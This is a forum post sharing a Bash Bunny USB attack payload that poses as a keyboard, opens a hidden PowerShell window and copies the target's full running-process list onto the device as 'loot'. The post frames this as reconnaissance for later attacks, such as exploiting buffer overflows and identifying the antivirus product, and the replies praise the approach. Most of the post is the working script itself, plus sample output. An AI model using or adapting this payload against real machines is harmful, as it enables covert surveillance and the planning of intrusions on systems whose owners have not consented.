Jump to content

[PAYLOAD] Process Info


Decoy

Recommended Posts

This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info:

Name                       : avpui
Id                         : 724
PriorityClass              : Normal
FileVersion                : 17.0.0.643
Path                       : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
Company                    : AO Kaspersky Lab
CPU                        : 85.875
ProductVersion             : 17.0.0.643
Description                : Kaspersky Anti-Virus
Product                    : Kaspersky Anti-Virus

https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo

#!/bin/bash
#
# Title:         Process Info
# Author:        Decoy
# Version:       1.0
# Category:      Recon
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, Storage
# 
# 
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking... ...Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished

# Initialization
LED R G 100

# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo

# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 1

# Sync File System
LED B 100
sync; sleep 1; sync

# Trap is clean
LED G

 

Edited by Decoy
Link to comment
Share on other sites

6 hours ago, Dave-ee Jones said:

Simple but effective.

Utilising simple powershell commands and functions is definitely one of the best things about Ducky script...

Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn,  and extremely effective.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...